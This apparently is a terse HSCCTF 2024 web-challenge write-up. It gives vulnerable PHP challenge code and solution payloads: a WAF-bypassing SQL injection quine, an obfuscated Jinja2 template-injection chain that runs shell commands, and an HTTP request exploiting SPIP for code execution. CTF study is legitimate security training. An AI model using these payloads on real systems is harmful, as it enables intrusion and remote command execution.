HSCCTF 2024 (WEB方向)

<?phperror_reporting(0);highlight_file(__FILE__);$con = mysqli_connect("localhost","root","root","ccut");function waffff($sql) {    if (preg_match("/infor|sys|sql|thread|case|when|if|like|left|right|mid|cmp|sub|locate|position|match|find|field|sleep|repeat|lock|bench|process|<|>|=|xor|and|&amp;&amp;|\\/i", $sql)) {        die("hacker");    }}if (isset($_POST['password'])) {    $password = $_POST['password'];    waffff($password);    $sql = "SELECT password FROM users WHERE username='admin' and password='$password'";    $user_result = mysqli_query($con,$sql);    $row = mysqli_fetch_array($user_result);    if ($row['password'] === $password) {        include "/flag";    } else {        echo "error";    }}?>

$password = $_POST['password'];$sql = "SELECT password FROM users WHERE username='admin' and password='$password'";if ($row['password'] === $password) {  include "/flag";}

'/**/union/**/SELECT/**/REPLACE(REPLACE('"/**/union/**/SELECT/**/REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")/**/AS/**/zue3r#',CHAR(34),CHAR(39)),CHAR(46),'"/**/union/**/SELECT/**/REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")/**/AS/**/zue3r#')/**/AS/**/zue3r#

message={% set zero = (self|int) %}{% set one=(zero**zero)|int %}{% set two = (zero-one-one)|abs %}{% set three=(two*two-one)|int %}{% set four = (two*two)|int %}{% set five = (two*two*two)-one-one-one %}{% set seven = (zero-one-one-five)|abs %}{% set eight = (two*two*two)|int %}{% set c = dict(c=aa)|reverse|first %}{% set bfh = self|string|urlencode|first %}{% set bfhc=bfh~c %}{% set space = bfhc%((three~two)|int) %}{% set xg = bfhc%((four~seven)|int) %}{% set cat = dict(ca=aa,t=dd)|join %}{% set flag = dict(fl=aa,ag=dd)|join %}{% set payload = cat~space~xg~flag%}{% set a = dict(__class__=aa)|reverse|first %}{% set b = dict(__init__=aa)|reverse|first %}{% set c = dict(__globals__=aa)|reverse|first %}{% set d = dict(__getitem__=aa)|reverse|first %}{% set e = dict(os=aa)|reverse|first %}{% set f = dict(popen=aa)|reverse|first %}{% set g = dict(read=aa)|reverse|first %}{{config|attr(a)|attr(b)|attr(c)|attr(d)(e)|attr(f)(payload)|attr(g)()}}{{g}}

<?phperror_reporting(0);$secret=getenv("SECRETKEY"); # For security reasons, the key length is greater than 8.
if(isset($_GET["md5"]) &amp;&amp; isset($_GET["applicant"]) &amp;&amp; isset($_GET["filename"])){    if($_GET["md5"] === md5($secret.$_GET["applicant"].$_GET["filename"])){        $file_contents = file_get_contents($_GET["filename"]);        echo $file_contents;    }else{        die("My tool is safe.");    }}else{    highlight_file(__FILE__);}

POST /spip.php?page=spip_pass&8=system('more%20/flag'); HTTP/1.1Host: 649ebf52-a81f-4e7c-ab2d-c58249beba9d.game.hscsec.cn:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 191
page=spip_pass&amp;formulaire_action=oubli&amp;formulaire_action_args=JWFEz0e3UDloiG3zKNtcjKCjPLtvQ3Ec0vfRTgIG7u7L0csbb259X%2Buk1lEX5F3%2F09Cb1W8MzTye1Q%3D%3D&amp;oubli=s:19:"<?=eval($_GET[8])?>";&amp;nobot=

<?phphighlight_file(__FILE__);error_reporting(0);$a=$_POST[1];$b="php://filter/$a/resource=/dev/null";if(file_get_contents($b)==="2024"){    echo file_get_contents('/flag');}else{    echo $b;}